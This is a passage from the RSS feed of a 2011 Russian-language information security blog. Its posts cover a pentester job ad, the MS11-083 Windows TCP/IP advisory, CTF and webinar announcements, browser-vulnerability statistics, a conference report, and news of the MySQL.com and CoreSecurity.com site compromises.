&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-6791203365894058087?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-15T15:07:51.309+04:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-rJEfWvaXIl4/TsJH-XXBqlI/AAAAAAAABVw/Sb435HC1VXU/s72-c/00.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Разыскиваются пентестеры</title><link>http://devteev.blogspot.com/2011/11/blog-post.html</link><category>positive technologies</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Thu, 10 Nov 2011 22:32:29 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-5758952197151690127</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
В связи с ростом числа работ по тестированию на проникновение и расширением одноименного отдела нам требуются новые силы!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Что такое работать пентестером в компании &lt;a href="http://www.ptsecurity.ru/"&gt;Positive Technologies&lt;/a&gt;?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://2.bp.blogspot.com/-U4pHoxC4Pdg/TrwbAGVuZ4I/AAAAAAAABVA/8UOVgb1jnTM/s1600/blog.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="150" src="http://2.bp.blogspot.com/-U4pHoxC4Pdg/TrwbAGVuZ4I/AAAAAAAABVA/8UOVgb1jnTM/s200/blog.jpg" width="200" /&gt;&lt;/a&gt;Это работа в высококвалифицированной команде профессионалов. Анализ защищенности сетевых инфраструктур ведущих российских и зарубежных компаний. Новые, комплексные, нестандартные и интересные задачи каждый день. Проведение тестов на проникновение, аудитов информационной безопасности, участие в исследовательской деятельности отдела, посещение и участие в российских и международных конференциях. Участие в организации передовой практической конференции по информационной безопасности &lt;a href="http://phdays.ru/"&gt;Positive Hack Days&lt;/a&gt;. Широкие возможности для развития собственных наработок и исследований в области информационной безопасности. Участие в некоммерческих хакерских проектах.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Кого мы ждем?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Кандидат должен иметь навыки практической компрометации или защиты систем, как минимум в одной из следующих областей:&lt;br /&gt;
-&amp;nbsp;сетевая инфраструктура и беспроводные сети (проектирование сетей, сетевое оборудование, протоколы маршрутизации, межсетевое экранирование, IDS/IPS)&lt;br /&gt;
-&amp;nbsp;информационная инфраструктура на бае Windows, Unix и Linux (ОС, служба каталога Active Directory, понимание принципов обработки и хранения чувствительной информации в ОС)&lt;br /&gt;
-&amp;nbsp;прикладные системы (СУБД, веб-приложения)&lt;br /&gt;
&lt;br /&gt;
Требуемый скилл:&lt;br /&gt;
- Опыт работы в сфере информационной безопасности от 0 до 5 лет&lt;br /&gt;
- Широкий кругозор в профессиональной отрасли&lt;br /&gt;
- Способность решать нетривиальные задачи&lt;br /&gt;
- Навыки программирования&lt;br /&gt;
- Желание учиться, изучать и самосовершенствоваться&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Работать в компании Positive Technologies – это круто! &lt;a href="http://hh.ru/vacancy/5128170"&gt;Ждем тебя!&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-5758952197151690127?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-11T10:32:29.074+04:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-U4pHoxC4Pdg/TrwbAGVuZ4I/AAAAAAAABVA/8UOVgb1jnTM/s72-c/blog.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">30</thr:total></item><item><title>MS11-083:Vulnerability in TCP/IP Could Allow Remote Code Execution</title><link>http://devteev.blogspot.com/2011/11/ms11-083vulnerability-in-tcpip-could.html</link><category>vulns</category><category>Microsoft</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 08 Nov 2011 11:14:17 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-6670624801513140633</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;a href="http://4.bp.blogspot.com/-Ri9uyxnBYEc/Trl_F-b0dsI/AAAAAAAABUg/oVpzeT_1p8I/s1600/microsoft_updates.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="93" src="http://4.bp.blogspot.com/-Ri9uyxnBYEc/Trl_F-b0dsI/AAAAAAAABUg/oVpzeT_1p8I/s200/microsoft_updates.jpg" width="100" /&gt;&lt;/a&gt;Ожидается сплоетс на уязвимость в реализации TCP/IP стека операционных систем Windows серии Vista и выше. "Правильный" &lt;b&gt;пакет&amp;nbsp;отправленный на закрытый порт&lt;/b&gt;&amp;nbsp;по протоколу UDP, &lt;b&gt;может &amp;nbsp;привести к выполнению произвольного кода&lt;/b&gt;.&amp;nbsp;С такой приятной новости начинается вторник нулевого дня))&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Подробности:&lt;/div&gt;&lt;div&gt;-&amp;nbsp;&lt;a href="http://www.securitylab.ru/vulnerability/409824.php"&gt;http://www.securitylab.ru/vulnerability/409824.php&lt;/a&gt;&lt;/div&gt;&lt;div&gt;-&amp;nbsp;&lt;a href="http://technet.microsoft.com/en-us/security/bulletin/ms11-083"&gt;http://technet.microsoft.com/en-us/security/bulletin/ms11-083&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-6670624801513140633?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-08T23:14:17.852+04:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-Ri9uyxnBYEc/Trl_F-b0dsI/AAAAAAAABUg/oVpzeT_1p8I/s72-c/microsoft_updates.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">10</thr:total></item><item><title>Чего ждать от Positive Hack Days CTF 2012?</title><link>http://devteev.blogspot.com/2011/11/positive-hack-days-ctf-2012.html</link><category>CTF</category><category>phdays</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 08 Nov 2011 02:31:58 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-1757665548692083023</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Такого нет даже в самых ваших смелых мыслях... ))&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-wIxgAvhAEF4/TrkENXJxdEI/AAAAAAAABUY/ShLzimXhzWk/s1600/PHDAYS+CTF+2012.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://2.bp.blogspot.com/-wIxgAvhAEF4/TrkENXJxdEI/AAAAAAAABUY/ShLzimXhzWk/s640/PHDAYS+CTF+2012.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;b&gt;Подготовка к PHD CTF 2012&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
К слову, скоро стоит ожидать анонс мероприятия и дату его проведения.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-1757665548692083023?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-08T14:31:58.917+04:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-wIxgAvhAEF4/TrkENXJxdEI/AAAAAAAABUY/ShLzimXhzWk/s72-c/PHDAYS+CTF+2012.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">7</thr:total></item><item><title>Client-Side Vulnerabilities</title><link>http://devteev.blogspot.com/2011/10/client-side-vulnerabilities.html</link><category>threats</category><category>client-side</category><category>статистика</category><category>метрики</category><category>угрозы</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 18 Oct 2011 09:18:45 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-5063931906537107766</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Глянул на досуге страничку статистики &lt;a href="http://www.surfpatrol.ru/report.aspx"&gt;серфпатруля&lt;/a&gt; и... совершенно не удивился, когда увидел, что  &lt;b&gt;86%&lt;/b&gt; посетителей этого блога бесстрашно серфят просторы интернета:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-yg4-oL4DqC0/Tp2hovnTziI/AAAAAAAABTQ/JeUCxP2l-IA/s1600/stat-devteev.blogspot.com.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="132" src="http://2.bp.blogspot.com/-yg4-oL4DqC0/Tp2hovnTziI/AAAAAAAABTQ/JeUCxP2l-IA/s640/stat-devteev.blogspot.com.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-7Vz5_9P912A/Tp2ikuTVGhI/AAAAAAAABTY/09ZHOMdMcqI/s1600/vulns-18.07.2011-18.10.2011.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="376" src="http://1.bp.blogspot.com/-7Vz5_9P912A/Tp2ikuTVGhI/AAAAAAAABTY/09ZHOMdMcqI/s640/vulns-18.07.2011-18.10.2011.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;Статистика по сайту devteev.blogspot.com (18.07.2011-18.10.2011)&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a name='more'&gt;&lt;/a&gt;Годы проходят, цифры не меняются [&lt;a href="http://devteev.blogspot.com/2009/12/7.html"&gt;1&lt;/a&gt;]. Интерес к уязвимостям в Adobe постепенно заменяет интерес к уязвимостям в JAVA [&lt;a href="http://www.microsoft.com/security/sir/default.aspx"&gt;2&lt;/a&gt;]. Рекомендую проявить озабоченность, тем, кто тут красный :)&lt;br /&gt;
&lt;center&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="http://www.surfpatrol.ru/report.aspx" target="_blank"&gt; &lt;img alt="SurfPatrol" height="61" id="SPcheck" src="http://www.surfpatrol.ru/image/banner_default.jpg" width="264" /&gt;&lt;/a&gt;&lt;/center&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-5063931906537107766?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-18T20:18:45.829+04:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-yg4-oL4DqC0/Tp2hovnTziI/AAAAAAAABTQ/JeUCxP2l-IA/s72-c/stat-devteev.blogspot.com.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">12</thr:total></item><item><title>Все что вы хотели знать про безопасность VOIP, но боялись спросить</title><link>http://devteev.blogspot.com/2011/10/voip.html</link><category>вебинары</category><category>positive technologies</category><category>security</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Mon, 10 Oct 2011 02:29:27 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-4711523630895757530</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Продолжая серию вебинаров в рамках образовательной программы "&lt;a href="http://www.ptsecurity.ru/webinars.asp"&gt;Практическая безопасность&lt;/a&gt;"&amp;nbsp;Константин Гурзов и &lt;a href="http://twitter.com/#!/repdet"&gt;Глеб Грицай&lt;/a&gt; раскроют тему безопасности технологии VOIP. Два ближайших вебинара полностью посвящены именно этой теме.&lt;br /&gt;
&lt;br /&gt;
13 октября 14:00 - Легенды и мифы безопасности VOIP&amp;nbsp;&lt;img border="0" src="http://1.bp.blogspot.com/-tJbLxP3j0m4/TjHEWKnd-dI/AAAAAAAABRs/FMZfkekY7YQ/s1600/check.png" /&gt;&amp;nbsp;&lt;a href="http://www.ptsecurity.ru/smt.asp?id=7"&gt;Зарегистрироваться&lt;/a&gt;&lt;br /&gt;
10 ноября 14:00 - Безопасность VOIP&amp;nbsp;&lt;img border="0" src="http://1.bp.blogspot.com/-tJbLxP3j0m4/TjHEWKnd-dI/AAAAAAAABRs/FMZfkekY7YQ/s1600/check.png" /&gt;&amp;nbsp;&lt;a href="http://www.ptsecurity.ru/ics/%D0%92%D0%B5%D0%B1%D0%B8%D0%BD%D0%B0%D1%80%20%D0%91%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D1%8C%20VOIP%20%20%D0%BA%D0%BE%D0%BC%D0%BF%D0%B0%D0%BD%D0%B8%D0%B8%20Positive%20Technologies.ics"&gt;Добавить в календарь&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-4711523630895757530?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-10T13:29:27.175+04:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-tJbLxP3j0m4/TjHEWKnd-dI/AAAAAAAABRs/FMZfkekY7YQ/s72-c/check.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure url="http://www.ptsecurity.ru/ics/%D0%92%D0%B5%D0%B1%D0%B8%D0%BD%D0%B0%D1%80%20%D0%91%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D1%8C%20VOIP%20%20%D0%BA%D0%BE%D0%BC%D0%BF%D0%B0%D0%BD%D0%B8%D0%B8%20Positive%20Technologies.ics" length="5435" type="application/octet-stream" /><media:content url="http://www.ptsecurity.ru/ics/%D0%92%D0%B5%D0%B1%D0%B8%D0%BD%D0%B0%D1%80%20%D0%91%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D1%8C%20VOIP%20%20%D0%BA%D0%BE%D0%BC%D0%BF%D0%B0%D0%BD%D0%B8%D0%B8%20Positive%20Technologies.ics" fileSize="5435" type="application/octet-stream" /><itunes:explicit>no</itunes:explicit><itunes:subtitle>Продолжая серию вебинаров в рамках образовательной программы "Практическая безопасность"&amp;nbsp;Константин Гурзов и Глеб Грицай раскроют тему безопасности технологии VOIP. Два ближайших вебинара полностью посвящены именно этой теме. 13 октября 14:00 - Леген</itunes:subtitle><itunes:author>noreply@blogger.com (Dmitry Evteev)</itunes:author><itunes:summary>Продолжая серию вебинаров в рамках образовательной программы "Практическая безопасность"&amp;nbsp;Константин Гурзов и Глеб Грицай раскроют тему безопасности технологии VOIP. Два ближайших вебинара полностью посвящены именно этой теме. 13 октября 14:00 - Легенды и мифы безопасности VOIP&amp;nbsp;&amp;nbsp;Зарегистрироваться 10 ноября 14:00 - Безопасность VOIP&amp;nbsp;&amp;nbsp;Добавить в календарь</itunes:summary><itunes:keywords>вебинары, positive technologies, security</itunes:keywords></item><item><title>Инфобез 2011</title><link>http://devteev.blogspot.com/2011/10/2011.html</link><category>мероприятия</category><category>security</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Fri, 07 Oct 2011 02:51:56 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-8905625550158130492</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Довелось на этой неделе побывать в качестве спикера на &lt;a href="http://infobez-expo.ru/"&gt;Инфобез 2011&lt;/a&gt;. Скажу честно, что предвкушая это мероприятие в мыслях крутился текст, что мол к подобным выставкам я отношусь крайне положительно. И в качестве аргументов вспоминал чувства и эмоции, которые испытывал на Infosecurity до его деления на два лагеря в далеком 2009 году. К сожалению, половинка Infosecurity под логотипом Инфобез не оправдала моих ожиданий и я был несколько разочарован.&lt;br /&gt;
&lt;div class="MsoPlainText"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;Несмотря на то, что в целом Инфобез оказался каким-то небольшим междусобойчиком, в центре всего действа&amp;nbsp;располагался&amp;nbsp;стенд... нет, вовсе не стенд компании &lt;a href="http://www.ptsecurity.ru/"&gt;Positive Technologies&lt;/a&gt;, а стенд, посвященный мероприятию &lt;a href="http://phdays.ru/"&gt;PHDAYS&lt;/a&gt; :) Что собственно многих посетителей несколько смутило.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-b3eXcLdTS_A/To7HipQDGQI/AAAAAAAABTA/-B2B_CA_rxI/s1600/infobez1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="376" src="http://4.bp.blogspot.com/-b3eXcLdTS_A/To7HipQDGQI/AAAAAAAABTA/-B2B_CA_rxI/s640/infobez1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a name='more'&gt;&lt;/a&gt;Чтобы как-то разнообразить свое прибывание на Инфобезе, мы с парнями решили устроить себе live hack ;) История началась с того, что в первый день мероприятия &lt;a href="http://www.infosecurityrussia.ru/2011/expo/risspa"&gt;Евгений Климов&lt;/a&gt; заметил своего двойника, который&amp;nbsp;располагая&amp;nbsp;пропуском в VIP-клуб (-бар) от имени Евгения не теряясь кутил там весь день, а к вечеру не отказал себе и в удовольствии отведать эля, которым угощали организаторы всех участников выставки безвозмездно. Мы решили повторить его подвиги в части клонирования Евгения Климова)&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-MSX6rncTPrw/To7IkECF_rI/AAAAAAAABTE/cCka3XHLut8/s1600/infobez2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://4.bp.blogspot.com/-MSX6rncTPrw/To7IkECF_rI/AAAAAAAABTE/cCka3XHLut8/s640/infobez2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-qmfS-vbGkqY/To7IwFiZuvI/AAAAAAAABTI/dM_28ezEqe0/s1600/infobez3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://4.bp.blogspot.com/-qmfS-vbGkqY/To7IwFiZuvI/AAAAAAAABTI/dM_28ezEqe0/s640/infobez3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;Ближе к завершению Инфобеза и после всех выступлений мы направились за заслуженными бонусами в сторону VIP...&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-xed3NyWAjDM/To7JRewNiGI/AAAAAAAABTM/v53XGXiyBFU/s1600/infobez4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://4.bp.blogspot.com/-xed3NyWAjDM/To7JRewNiGI/AAAAAAAABTM/v53XGXiyBFU/s640/infobez4.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;b&gt;Профит11 :)&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;Ниже презентации с моих выступлений.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;Секция &lt;a href="http://lukatsky.blogspot.com/"&gt;Алексея Лукацкого&lt;/a&gt;, Все хотят работать удаленно. Кто будет думать о безопасности?&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;center&gt;&lt;div id="__ss_9589972" style="width: 425px;"&gt;&lt;strong style="display: block; margin: 12px 0 4px;"&gt;&lt;a href="http://www.slideshare.net/devteev/ss-9589972" target="_blank" title="Мобильный офис глазами пентестера"&gt;Мобильный офис глазами пентестера&lt;/a&gt;&lt;/strong&gt; &lt;iframe frameborder="0" height="355" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/9589972" width="425"&gt;&lt;/iframe&gt; &lt;br /&gt;
&lt;div style="padding: 5px 0 12px;"&gt;View more &lt;a href="http://www.slideshare.net/" target="_blank"&gt;presentations&lt;/a&gt; from &lt;a href="http://www.slideshare.net/devteev" target="_blank"&gt;Dmitry Evteev&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;/center&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;Секция Владимира Лепихина,&amp;nbsp;Проблемы противодействия атакам на отказ в обслуживании (DDoS-атакам)&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;center&gt;&lt;div id="__ss_9590024" style="width: 425px;"&gt;&lt;strong style="display: block; margin: 12px 0 4px;"&gt;&lt;a href="http://www.slideshare.net/devteev/ddos-9590024" target="_blank" title="Практика проведения DDoS-тестирований"&gt;Практика проведения DDoS-тестирований&lt;/a&gt;&lt;/strong&gt; &lt;iframe frameborder="0" height="355" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/9590024" width="425"&gt;&lt;/iframe&gt; &lt;br /&gt;
&lt;div style="padding: 5px 0 12px;"&gt;View more &lt;a href="http://www.slideshare.net/" target="_blank"&gt;presentations&lt;/a&gt; from &lt;a href="http://www.slideshare.net/devteev" target="_blank"&gt;Dmitry Evteev&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;/center&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-8905625550158130492?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-07T13:51:56.469+04:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-b3eXcLdTS_A/To7HipQDGQI/AAAAAAAABTA/-B2B_CA_rxI/s72-c/infobez1.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></item><item><title>(снова) Взломан сайт MySQL.com</title><link>http://devteev.blogspot.com/2011/09/mysqlcom.html</link><category>инциденты</category><category>web security</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Wed, 28 Sep 2011 04:28:03 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-3491018277497488448</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;a href="http://4.bp.blogspot.com/-DCGLqFMUHtU/ToLX05QiuJI/AAAAAAAABS8/fOJhUJpJEGU/s1600/640_hacker_web.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="133" src="http://4.bp.blogspot.com/-DCGLqFMUHtU/ToLX05QiuJI/AAAAAAAABS8/fOJhUJpJEGU/s200/640_hacker_web.JPG" width="200" /&gt;&lt;/a&gt;Какая-то нездоровая тенденция наблюдается в последнее время. То и дело ломают крупные проекты, безопасность которых по идее должна быть примером для подражания.&amp;nbsp;&lt;a href="http://www.xakep.ru/post/56667/default.asp"&gt;Kernel.org&lt;/a&gt;, &lt;a href="http://www.xakep.ru/post/56751/default.asp"&gt;Linux.com&lt;/a&gt;, &lt;a href="http://sourceforge.net/blog/sourceforge-attack-full-report/"&gt;SourceForge.net&lt;/a&gt;, &lt;a href="http://www.devquotes.com/2011/03/18/php-net-compromise-possible-backdoor/"&gt;PHP.net&lt;/a&gt;&amp;nbsp;в далеком 2009 &lt;a href="http://www.xakep.ru/post/49377/default.asp"&gt;Apache.org&lt;/a&gt;. Хорошо, если по результатам инцидента делаются правильные выводы и адекватные действия, так ведь нет! Не все&amp;nbsp;учатся&amp;nbsp;с первого раза.&lt;br /&gt;
&lt;br /&gt;
Меньше полугода &lt;a href="http://nakedsecurity.sophos.com/2011/03/27/mysql-com-and-sun-hacked-through-sql-injection/"&gt;был взломан&lt;/a&gt; сайт MySQL.com и вот снова, &lt;a href="http://www.securitylab.ru/news/407502.php"&gt;проект подвергся той же напасти&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Может быть уже пришло время&amp;nbsp;&lt;a href="http://devteev.blogspot.com/2011/09/4.html"&gt;учиться на ошибках&lt;/a&gt; других и &lt;strike&gt;уже что-то делать&lt;/strike&gt;&amp;nbsp;обеспечивать адекватную безопасность информационным активам?&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-3491018277497488448?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-28T15:28:03.513+04:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-DCGLqFMUHtU/ToLX05QiuJI/AAAAAAAABS8/fOJhUJpJEGU/s72-c/640_hacker_web.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total></item><item><title>CoreSecurity.com defaced</title><link>http://devteev.blogspot.com/2011/09/coresecuritycom-defaced.html</link><category>инциденты</category><category>взлом</category><category>hackers</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Fri, 23 Sep 2011 03:21:28 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-572882731070758242</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Вчера &lt;a href="http://www.coresecurity.com/"&gt;оф. сайт&lt;/a&gt; известной компании в области информационной безопасности, разработчика профессионального инструмента для проведения тестирований на проникновение &lt;a href="http://www.coresecurity.com/content/core-impact-overview"&gt;CORE IMPACT&lt;/a&gt;, подвергся &lt;a href="http://legend-h.org/mirror/223007/coresecurity.com/"&gt;дефейсу&lt;/a&gt;. Примечательно, что на странице дефейса злоумышленник оставил ссылку на свой аккаунт в &lt;a href="http://twitter.com/#!/snc0pe"&gt;твиттере&lt;/a&gt;. Судя по дефейсу, взлом был осуществлен из побуждений мести...&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-3wZX9XEGG8U/TnxdRu4VrgI/AAAAAAAABS4/kSHPzesvlSc/s1600/x.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="251" src="http://3.bp.blogspot.com/-3wZX9XEGG8U/TnxdRu4VrgI/AAAAAAAABS4/kSHPzesvlSc/s400/x.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
P.S. Ярко выраженный представитель хакерского сообщества.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-572882731070758242?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-23T14:21:28.582+04:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-3wZX9XEGG8U/TnxdRu4VrgI/AAAAAAAABS4/kSHPzesvlSc/s72-c/x.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Хроники пентестера #4: безопасность внешних веб-приложений</title><link>http://devteev.blogspot.com/2011/09/4.html</link><category>pentest</category><category>тест на проникновение</category><category>security</category><category>web security</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Thu, 22 